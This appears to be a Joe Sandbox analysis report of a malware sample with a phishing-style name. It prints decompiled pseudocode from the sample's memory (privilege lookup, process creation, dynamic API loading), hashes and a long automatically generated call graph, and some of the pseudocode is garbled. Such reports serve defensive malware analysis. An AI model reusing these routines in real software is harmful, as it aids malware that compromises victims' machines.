                                                                                            • Opcode ID: 3475e4ce147188984917274b23a3ce64a2d51b7d96393a60bc76b0d7bf074b16
                                                                                            • Instruction ID: 3ce4712d63a825713472f4f22c312be3b431b1c6076f52d3c182b7c21b3038ff
                                                                                            • Opcode Fuzzy Hash: 3475e4ce147188984917274b23a3ce64a2d51b7d96393a60bc76b0d7bf074b16
                                                                                            • Instruction Fuzzy Hash: E5E012B5210208ABDB14EF99DC45EE737ADAF88664F018159FA185B282CA30F914CAB0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 219 407629-40762a 220 4075f5-4075f8 219->220 221 40762c-40762d 219->221 222 4075fa-4075fc 220->222 223 4075ae-4075be call 41a6a0 220->223 224 4075c4-4075c5 221->224 225 40762f-40767a call 41a720 call 41b300 call 409f70 call 4142d0 221->225 237 40767c-40768e PostThreadMessageW 225->237 238 4076ae-4076b2 225->238 239 407690-4076aa call 4096d0 237->239 240 4076ad 237->240 239->240 240->238
                                                                                            C-Code - Quality: 46%
                                                                                            			E00407629(void* __eflags, long _a8) {
                                                                                            				char _v63;
                                                                                            				char _v64;
                                                                                            				long __edi;
                                                                                            				int __esi;
                                                                                            				void* _t11;
                                                                                            				void* _t14;
                                                                                            				void* _t18;
                                                                                            
                                                                                            				if(__eflags <= 0) {
                                                                                            					asm("sbb al, 0xfc");
                                                                                            					_t19 = _t18 + 1;
                                                                                            					__eflags = _t18 + 1;
                                                                                            					if(_t18 + 1 < 0) {
                                                                                            						E0041A6A0();
                                                                                            						return 0;
                                                                                            					} else {
                                                                                            						asm("invalid");
                                                                                            						_t14 = E0041A0A0(_t11, _t19, 0x11c6f95e);
                                                                                            						return E00419F50(_t19) + _t14 + 0x1000;
                                                                                            					}
                                                                                            				} else {
                                                                                            					asm("outsb");
                                                                                            					asm("loope 0xffffff97");
                                                                                            					__ebp = 0x83ec8b55;
                                                                                            					_push(0x83ec8b55);
                                                                                            					__ebp = __esp;
                                                                                            					__esp = __esp - 0x40;
                                                                                            					_push(__esi);
                                                                                            					_t3 =  &_v63; // 0x83ec8b16
                                                                                            					__eax = _t3;
                                                                                            					_v64 = 0;
                                                                                            					__eax = E0041A720(_t3, 0, 0x3f);
                                                                                            					_t5 =  &_v64; // 0x83ec8b15
                                                                                            					__ecx = _t5;
                                                                                            					__eax = E0041B300(_t5, 3);
                                                                                            					__esi = _a8;
                                                                                            					_t7 =  &_v64; // 0x83ec8b15
                                                                                            					__esi = _a8 + 0x20;
                                                                                            					__eax = E00409F70(__eflags, _a8 + 0x20, _t7); // executed
                                                                                            					__eax = E004142D0(__ecx, _a8 + 0x20, __eax, 0, 0, 0xc4e7b6d6);
                                                                                            					__esi = __eax;
                                                                                            					__eflags = __esi;
                                                                                            					if(__esi != 0) {
                                                                                            						_push(__edi);
                                                                                            						__edi = _a8;
                                                                                            						__eax = PostThreadMessageW(__edi, 0x111, 0, 0); // executed
                                                                                            						__eflags = __eax;
                                                                                            						if(__eflags == 0) {
                                                                                            							__eax = E004096D0(__eflags, 1, 8);
                                                                                            							_t10 = (__al & 0x000000ff) - 0x40; // 0x83ec8b15
                                                                                            							__ecx = __ebp + _t10;
                                                                                            							__eax =  *__esi(__edi, 0x8003, __ebp + _t10, __eax);
                                                                                            						}
                                                                                            						_pop(__edi);
                                                                                            					}
                                                                                            					_pop(__esi);
                                                                                            					__esp = __ebp;
                                                                                            					_pop(__ebp);
                                                                                            					return __eax;
                                                                                            				}
                                                                                            			}











                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040768A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: bd8fc6456d05cc08e3e484afbca47ed5431c5357cef41c43edc71c40475ed825
                                                                                            • Instruction ID: 0391cfbc88caf94892ae891e4054be77c26fe76d28bdabc601f68bb7d407126f
                                                                                            • Opcode Fuzzy Hash: bd8fc6456d05cc08e3e484afbca47ed5431c5357cef41c43edc71c40475ed825
                                                                                            • Instruction Fuzzy Hash: 74110831A402197AE72096948C03FFE77189B44B54F14042EFB04FA2C2E6AD7E0747A9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 243 407630-40763f 244 407648-40767a call 41b300 call 409f70 call 4142d0 243->244 245 407643 call 41a720 243->245 252 40767c-40768e PostThreadMessageW 244->252 253 4076ae-4076b2 244->253 245->244 254 407690-4076aa call 4096d0 252->254 255 4076ad 252->255 254->255 255->253
                                                                                            C-Code - Quality: 82%
                                                                                            			E00407630(intOrPtr _a4, long _a8) {
                                                                                            				char _v67;
                                                                                            				char _v68;
                                                                                            				void* _t12;
                                                                                            				intOrPtr* _t13;
                                                                                            				int _t14;
                                                                                            				long _t21;
                                                                                            				intOrPtr* _t25;
                                                                                            				void* _t26;
                                                                                            				void* _t30;
                                                                                            
                                                                                            				_t1 =  &_v67; // 0x83ec8b16
                                                                                            				_v68 = 0;
                                                                                            				E0041A720(_t1, 0, 0x3f);
                                                                                            				_t3 =  &_v68; // 0x83ec8b15
                                                                                            				E0041B300(_t3, 3);
                                                                                            				_t5 =  &_v68; // 0x83ec8b15
                                                                                            				_t12 = E00409F70(_t30, _a4 + 0x20, _t5); // executed
                                                                                            				_t13 = E004142D0(_t3, _a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
                                                                                            				_t25 = _t13;
                                                                                            				if(_t25 != 0) {
                                                                                            					_t21 = _a8;
                                                                                            					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                                            					_t32 = _t14;
                                                                                            					if(_t14 == 0) {
                                                                                            						_t8 = (E004096D0(_t32, 1, 8) & 0x000000ff) - 0x40; // 0x83ec8b15
                                                                                            						_t14 =  *_t25(_t21, 0x8003, _t26 + _t8, _t14);
                                                                                            					}
                                                                                            					return _t14;
                                                                                            				}
                                                                                            				return _t13;
                                                                                            			}













                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040768A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: 84b15edaa294b34923a287f7395c5b0c7ce486137542d4536ac6b9a8eb19a39a
                                                                                            • Instruction ID: a136aea8e73414db159388e9070755cc2605e6a50b49d7e88f5267c317adf1d1
                                                                                            • Opcode Fuzzy Hash: 84b15edaa294b34923a287f7395c5b0c7ce486137542d4536ac6b9a8eb19a39a
                                                                                            • Instruction Fuzzy Hash: EC01D831A4021876E720A6958C03FFE772C5B00B54F04001AFF04BA1C1E6A9790646EA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 285 418db3-418e28 call 419700 ExitProcess
                                                                                            C-Code - Quality: 31%
                                                                                            			E00418DB3() {
                                                                                            				int _v0;
                                                                                            				void* _v1;
                                                                                            				intOrPtr _v4;
                                                                                            				void* _t7;
                                                                                            				signed int _t15;
                                                                                            				signed int _t16;
                                                                                            				void* _t18;
                                                                                            				signed int _t22;
                                                                                            
                                                                                            				_t16 = _t15 |  *(_t7 + _t18);
                                                                                            				asm("std");
                                                                                            				asm("hlt");
                                                                                            				_push(cs);
                                                                                            				asm("fisubr dword [edx+ecx*2]");
                                                                                            				_t22 =  &_v1 &  *(_t16 - 0x70a9831);
                                                                                            				asm("fldcw word [esi-0x741374ab]");
                                                                                            				_push(_t22);
                                                                                            				_t9 = _v4;
                                                                                            				E00419700( *((intOrPtr*)(_v4 + 0xa18)), _t9, _t9 + 0xc84,  *((intOrPtr*)(_v4 + 0xa18)), 0, 0x36);
                                                                                            				ExitProcess(_v0);
                                                                                            			}












                                                                                            APIs
                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418E28
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: db552e14f202af22712bd1fd330bade77233ffec33b66d63c146a6e021001cb7
                                                                                            • Instruction ID: 6447a13a17c000712bb8a37dc7370de49cab37a5c4e2b574e9a8726c50ec24f0
                                                                                            • Opcode Fuzzy Hash: db552e14f202af22712bd1fd330bade77233ffec33b66d63c146a6e021001cb7
                                                                                            • Instruction Fuzzy Hash: F9E02274018608AFDB11AB14CC81D877BA0EF02B10F05479CE4E81F007CA35AA22CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 289 418dc0-418df1 call 419700 RtlFreeHeap
                                                                                            C-Code - Quality: 100%
                                                                                            			E00418DC0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                            				char _t10;
                                                                                            
                                                                                            				_t3 = _a4 + 0xc7c; // 0xc7c
                                                                                            				E00419700( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
                                                                                            				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                            				return _t10;
                                                                                            			}




                                                                                            0x00418dcf
                                                                                            0x00418dd7
                                                                                            0x00418ded
                                                                                            0x00418df1

                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00408F43,?,?,00408F43,00000060,00000000,00000000,?,?,00408F43,?,00000000), ref: 00418DED
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: 4e30e59f8a7cae1eea1a44fc2eb512081b274e14a77e40b60adbf75a3d3a8219
                                                                                            • Instruction ID: 70852f986b88bd22bba351ddd047dfa98c23c8b1edf630760962ab5a7e0eeca2
                                                                                            • Opcode Fuzzy Hash: 4e30e59f8a7cae1eea1a44fc2eb512081b274e14a77e40b60adbf75a3d3a8219
                                                                                            • Instruction Fuzzy Hash: 74E01AB5210204ABD714DF99DC45E9737ADAF88750F018159F91857241C530E910CAB0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E00418F20(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                            				int _t10;
                                                                                            
                                                                                            				E00419700( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xc94,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
                                                                                            				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                            				return _t10;
                                                                                            			}




                                                                                            0x00418f3a
                                                                                            0x00418f50
                                                                                            0x00418f54

                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D3F2,0040D3F2,00000041,00000000,?,00408FB5), ref: 00418F50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 773a9d1d4718297720046bce545899814da927c5dee80faf5a466a74b6c9604b
                                                                                            • Instruction ID: ecbe9d4e3f583988c1c827a8b5eb191ae685218fb2d7aa99a9dbd1465323ab75
                                                                                            • Opcode Fuzzy Hash: 773a9d1d4718297720046bce545899814da927c5dee80faf5a466a74b6c9604b
                                                                                            • Instruction Fuzzy Hash: 75E01AB5210208ABD714DF99CC45EE737ADAF89760F018155FA0C57241C530E811CAB5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 79%
                                                                                            			E00418DBE(void* __eax, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                            				char _v1;
                                                                                            				char _t12;
                                                                                            
                                                                                            				_push( &_v1);
                                                                                            				_t9 = _a4;
                                                                                            				_t3 = _t9 + 0xc7c; // 0xc7c
                                                                                            				E00419700( *((intOrPtr*)(_a4 + 0x14)), _t9, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
                                                                                            				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                            				return _t12;
                                                                                            			}






                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00408F43,?,?,00408F43,00000060,00000000,00000000,?,?,00408F43,?,00000000), ref: 00418DED
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: d39915d30231c88c02befcc7989e40e4419f3e63c37b813ae00a4e13ec57a1b3
                                                                                            • Instruction ID: d56a0894eff1da85dba6ffdcc7a2d7567c0b3422cbbfd1398c4b6c9530869ea3
                                                                                            • Opcode Fuzzy Hash: d39915d30231c88c02befcc7989e40e4419f3e63c37b813ae00a4e13ec57a1b3
                                                                                            • Instruction Fuzzy Hash: BCE0C2B81242495BDB10EFA9D8908AB77D5FF853147118A4AE85887703C234D85ACBB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E00418E00(intOrPtr _a4, int _a8) {
                                                                                            
                                                                                            				_t5 = _a4;
                                                                                            				E00419700( *((intOrPtr*)(_a4 + 0xa18)), _t5, _t5 + 0xc84,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x36);
                                                                                            				ExitProcess(_a8);
                                                                                            			}



                                                                                            0x00418e03
                                                                                            0x00418e1a
                                                                                            0x00418e28

                                                                                            APIs
                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418E28
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: f534823884a614df79104f3219a800c5f567eb79e9528ffb644fd058e25bc354
                                                                                            • Instruction ID: 8a2151c9915900c5a50a6b6facd23392ca56ec41274e49eba0b8d6d2dd10ecc1
                                                                                            • Opcode Fuzzy Hash: f534823884a614df79104f3219a800c5f567eb79e9528ffb644fd058e25bc354
                                                                                            • Instruction Fuzzy Hash: E3D01776610218BBDA24EF99CC85FD777ACDF456A0F0580A5FA1C6B282C934BA00C7E4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cf5016a01af15f382769292de5662a1c779951c037434570365bcbf58a9bda21
                                                                                            • Instruction ID: 22407d329ac03560312ad28e89e7483ece2a5605153795ef05de3880859a8d23
                                                                                            • Opcode Fuzzy Hash: cf5016a01af15f382769292de5662a1c779951c037434570365bcbf58a9bda21
                                                                                            • Instruction Fuzzy Hash: 2BC08C23BAA5280500160C0AAC901F4F395E296920B10F666C808EF500CA06C11600CC
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Execution Graph

                                                                                            Execution Coverage:5.3%
                                                                                            Dynamic/Decrypted Code Coverage:2%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:707
                                                                                            Total number of Limit Nodes:85
29468->29469 29471 25c36bf 29468->29471 29469->29468 29591 25cb890 29471->29591 29473 25cb890 2 API calls 29474 25c37be 29473->29474 29475 25cb890 2 API calls 29474->29475 29476 25c37c8 29475->29476 29477 25cb890 2 API calls 29476->29477 29478 25c37d2 29477->29478 29479 25cb890 2 API calls 29478->29479 29479->29480 29480->29337 29482 25c4821 29481->29482 29483 25c3ed0 8 API calls 29482->29483 29488 25c4837 29483->29488 29484 25c4840 29484->29341 29485 25c4877 29486 25ca680 2 API calls 29485->29486 29487 25c4888 29486->29487 29487->29341 29488->29484 29488->29485 29489 25c48c3 29488->29489 29490 25ca680 2 API calls 29489->29490 29491 25c48c8 29490->29491 29491->29341 29595 25c9380 29492->29595 29494 25c9504 29495 25c9380 LdrLoadDll 29494->29495 29496 25c950d 29495->29496 29497 25c9380 LdrLoadDll 29496->29497 29498 25c9516 29497->29498 29499 25c9380 LdrLoadDll 29498->29499 29500 25c951f 29499->29500 29501 25c9380 LdrLoadDll 29500->29501 29502 25c9528 29501->29502 29503 25c9380 LdrLoadDll 29502->29503 29504 25c9531 29503->29504 29505 25c9380 LdrLoadDll 29504->29505 29506 25c953d 29505->29506 29507 25c9380 LdrLoadDll 29506->29507 29508 25c9546 29507->29508 29509 25c9380 LdrLoadDll 29508->29509 29510 25c954f 29509->29510 29511 25c9380 LdrLoadDll 29510->29511 29512 25c9558 29511->29512 29513 25c9380 LdrLoadDll 29512->29513 29514 25c9561 29513->29514 29515 25c9380 LdrLoadDll 29514->29515 29516 25c956a 29515->29516 29517 25c9380 LdrLoadDll 29516->29517 29518 25c9576 29517->29518 29519 25c9380 LdrLoadDll 29518->29519 29520 25c957f 29519->29520 29521 25c9380 LdrLoadDll 29520->29521 29522 25c9588 29521->29522 29523 25c9380 LdrLoadDll 29522->29523 29524 25c9591 29523->29524 29525 25c9380 LdrLoadDll 29524->29525 29526 25c959a 29525->29526 29527 25c9380 LdrLoadDll 29526->29527 29528 25c95a3 29527->29528 29529 25c9380 LdrLoadDll 29528->29529 29530 25c95af 29529->29530 29531 25c9380 LdrLoadDll 29530->29531 29532 25c95b8 29531->29532 29533 25c9380 LdrLoadDll 29532->29533 29534 
25c95c1 29533->29534 29535 25c9380 LdrLoadDll 29534->29535 29536 25c95ca 29535->29536 29537 25c9380 LdrLoadDll 29536->29537 29538 25c95d3 29537->29538 29539 25c9380 LdrLoadDll 29538->29539 29540 25c95dc 29539->29540 29541 25c9380 LdrLoadDll 29540->29541 29542 25c95e8 29541->29542 29543 25c9380 LdrLoadDll 29542->29543 29544 25c95f1 29543->29544 29545 25c9380 LdrLoadDll 29544->29545 29546 25c95fa 29545->29546 29547 25c9380 LdrLoadDll 29546->29547 29548 25c9603 29547->29548 29549 25c9380 LdrLoadDll 29548->29549 29550 25c960c 29549->29550 29551 25c9380 LdrLoadDll 29550->29551 29552 25c9615 29551->29552 29553 25c9380 LdrLoadDll 29552->29553 29554 25c9621 29553->29554 29555 25c9380 LdrLoadDll 29554->29555 29556 25c962a 29555->29556 29557 25c9380 LdrLoadDll 29556->29557 29558 25c9633 29557->29558 29559 25c9380 LdrLoadDll 29558->29559 29560 25c963c 29559->29560 29561 25c9380 LdrLoadDll 29560->29561 29562 25c9645 29561->29562 29563 25c9380 LdrLoadDll 29562->29563 29564 25c964e 29563->29564 29565 25c9380 LdrLoadDll 29564->29565 29566 25c965a 29565->29566 29567 25c9380 LdrLoadDll 29566->29567 29568 25c9663 29567->29568 29569 25c9380 LdrLoadDll 29568->29569 29570 25c966c 29569->29570 29570->29345 29572 25c9700 LdrLoadDll 29571->29572 29573 25c862c 29572->29573 29601 4619860 LdrInitializeThunk 29573->29601 29574 25c8643 29574->29267 29576->29342 29578 25c9700 LdrLoadDll 29577->29578 29579 25c8cac NtAllocateVirtualMemory 29578->29579 29579->29448 29581 25cb846 29580->29581 29582 25cb840 29580->29582 29583 25ca850 2 API calls 29581->29583 29582->29453 29584 25cb86c 29583->29584 29584->29453 29586 25cb8d0 29585->29586 29587 25ca850 2 API calls 29586->29587 29588 25cb92d 29586->29588 29589 25cb90a 29587->29589 29588->29461 29590 25ca680 2 API calls 29589->29590 29590->29588 29592 25ca680 2 API calls 29591->29592 29593 25c37b4 29592->29593 29593->29473 29594->29458 29596 25c939b 29595->29596 29597 25c42d0 LdrLoadDll 29596->29597 29599 25c93bb 29597->29599 29598 25c946f 29598->29494 
29599->29598 29600 25c42d0 LdrLoadDll 29599->29600 29600->29598 29601->29574 29603 4619681 29602->29603 29604 461968f LdrInitializeThunk 29602->29604 29603->29351 29604->29351 29606 25c9700 LdrLoadDll 29605->29606 29607 25c8ddc RtlFreeHeap 29606->29607 29607->29354 29609 25b71cb 29608->29609 29610 25b71d0 29608->29610 29609->29275 29611 25ca600 2 API calls 29610->29611 29617 25b71f5 29611->29617 29612 25b7258 29612->29275 29613 25c8610 2 API calls 29613->29617 29614 25b725e 29616 25b7284 29614->29616 29618 25c8d10 2 API calls 29614->29618 29616->29275 29617->29612 29617->29613 29617->29614 29620 25ca600 2 API calls 29617->29620 29624 25c8d10 29617->29624 29619 25b7275 29618->29619 29619->29275 29620->29617 29622 25b749e 29621->29622 29623 25c8d10 2 API calls 29621->29623 29622->29232 29623->29622 29625 25c9700 LdrLoadDll 29624->29625 29626 25c8d2c 29625->29626 29629 46196e0 LdrInitializeThunk 29626->29629 29627 25c8d43 29627->29617 29629->29627 29631 25c9dc3 29630->29631 29634 25b9f70 29631->29634 29635 25b9f94 29634->29635 29636 25b9fd0 LdrLoadDll 29635->29636 29637 25b8eab 29635->29637 29636->29637 29637->29240 29639 25ba2e3 29638->29639 29641 25ba360 29639->29641 29654 25c83e0 LdrLoadDll 29639->29654 29641->29245 29643 25c9700 LdrLoadDll 29642->29643 29644 25bd3db 29643->29644 29644->29253 29645 25c8f20 29644->29645 29646 25c8f3f LookupPrivilegeValueW 29645->29646 29647 25c9700 LdrLoadDll 29645->29647 29646->29249 29647->29646 29649 25c89be 29648->29649 29650 25c9700 LdrLoadDll 29649->29650 29651 25c89cc 29650->29651 29655 4619910 LdrInitializeThunk 29651->29655 29652 25c89eb 29652->29250 29654->29641 29655->29652 29657 25ba44b 29656->29657 29658 25ba2c0 LdrLoadDll 29657->29658 29659 25ba496 29658->29659 29659->29191 29661 25ba1b4 29660->29661 29716 25c83e0 LdrLoadDll 29661->29716 29663 25ba1ee 29663->29193 29665 25bd5cc 29664->29665 29666 25ba440 LdrLoadDll 29665->29666 29667 25bd5de 29666->29667 29717 25bd4b0 29667->29717 29670 25bd5f9 29672 25bd604 
29670->29672 29674 25c8be0 2 API calls 29670->29674 29671 25bd611 29673 25bd622 29671->29673 29675 25c8be0 2 API calls 29671->29675 29672->29197 29673->29197 29674->29672 29675->29673 29677 25bb316 29676->29677 29678 25bb320 29676->29678 29677->29206 29679 25ba2c0 LdrLoadDll 29678->29679 29680 25bb391 29679->29680 29681 25ba190 LdrLoadDll 29680->29681 29683 25bb3a5 29681->29683 29682 25bb3c8 29682->29206 29683->29682 29684 25ba2c0 LdrLoadDll 29683->29684 29685 25bb3e4 29684->29685 29686 25c3ed0 8 API calls 29685->29686 29687 25bb439 29686->29687 29687->29206 29689 25bbe96 29688->29689 29690 25ba2c0 LdrLoadDll 29689->29690 29691 25bbeaa 29690->29691 29736 25bbb60 29691->29736 29693 25b83cc 29714 25bb450 LdrLoadDll 29693->29714 29765 25bd860 29694->29765 29696 25b8073 29709 25b8271 29696->29709 29770 25c3820 29696->29770 29698 25b80d2 29698->29709 29773 25b7e10 29698->29773 29701 25cb830 2 API calls 29702 25b8119 29701->29702 29703 25cb960 3 API calls 29702->29703 29705 25b812e 29703->29705 29704 25b71c0 4 API calls 29710 25b8180 29704->29710 29705->29710 29832 25b3660 10 API calls 29705->29832 29709->29195 29710->29704 29710->29709 29712 25b7480 2 API calls 29710->29712 29778 25bb030 29710->29778 29828 25bd800 29710->29828 29833 25bd2e0 21 API calls 29710->29833 29712->29710 29713->29201 29714->29211 29715->29215 29716->29663 29718 25bd580 29717->29718 29719 25bd4ca 29717->29719 29718->29670 29718->29671 29720 25ba2c0 LdrLoadDll 29719->29720 29721 25bd4ec 29720->29721 29727 25c8690 29721->29727 29723 25bd52e 29730 25c86d0 29723->29730 29726 25c8be0 2 API calls 29726->29718 29728 25c9700 LdrLoadDll 29727->29728 29729 25c86ac 29728->29729 29729->29723 29731 25c9700 LdrLoadDll 29730->29731 29732 25c86ec 29731->29732 29735 4619fe0 LdrInitializeThunk 29732->29735 29733 25bd574 29733->29726 29735->29733 29737 25bbb77 29736->29737 29745 25bd8a0 29737->29745 29741 25bbbeb 29742 25bbbf2 29741->29742 29756 25c89f0 LdrLoadDll 29741->29756 29742->29693 29744 25bbc05 
29744->29693 29746 25bd8c5 29745->29746 29757 25b74c0 29746->29757 29748 25bbbbf 29753 25c8e30 29748->29753 29749 25bd8e9 29749->29748 29750 25c3ed0 8 API calls 29749->29750 29752 25ca680 2 API calls 29749->29752 29764 25bd6e0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 29749->29764 29750->29749 29752->29749 29754 25c9700 LdrLoadDll 29753->29754 29755 25c8e4f CreateProcessInternalW 29754->29755 29755->29741 29756->29744 29758 25b75bf 29757->29758 29759 25b74d5 29757->29759 29758->29749 29759->29758 29760 25c3ed0 8 API calls 29759->29760 29761 25b7542 29760->29761 29762 25ca680 2 API calls 29761->29762 29763 25b7569 29761->29763 29762->29763 29763->29749 29764->29749 29766 25bd87f 29765->29766 29767 25c42d0 LdrLoadDll 29765->29767 29768 25bd88d 29766->29768 29769 25bd886 SetErrorMode 29766->29769 29767->29766 29768->29696 29769->29768 29772 25c3846 29770->29772 29834 25bd630 29770->29834 29772->29698 29774 25ca600 2 API calls 29773->29774 29777 25b7e35 29774->29777 29775 25b8050 29775->29701 29777->29775 29853 25c7fd0 29777->29853 29779 25bb049 29778->29779 29780 25bb04f 29778->29780 29901 25bd0f0 29779->29901 29910 25b8a60 29780->29910 29783 25bb05c 29784 25cb960 3 API calls 29783->29784 29827 25bb2f2 29783->29827 29785 25bb078 29784->29785 29786 25bb08c 29785->29786 29787 25bd800 2 API calls 29785->29787 29919 25c8460 29786->29919 29787->29786 29790 25bb1c0 29935 25bafd0 LdrLoadDll LdrInitializeThunk 29790->29935 29791 25c8650 2 API calls 29792 25bb10a 29791->29792 29792->29790 29798 25bb116 29792->29798 29794 25bb1df 29795 25bb1e7 29794->29795 29936 25baf40 LdrLoadDll NtClose LdrInitializeThunk 29794->29936 29796 25c8be0 2 API calls 29795->29796 29800 25bb1f1 29796->29800 29799 25bb169 29798->29799 29802 25c8760 2 API calls 29798->29802 29798->29827 29803 25c8be0 2 API calls 29799->29803 29800->29710 29801 25bb209 29801->29795 29804 25bb210 29801->29804 29802->29799 29805 25bb186 29803->29805 29806 25bb228 29804->29806 29937 25baec0 LdrLoadDll 
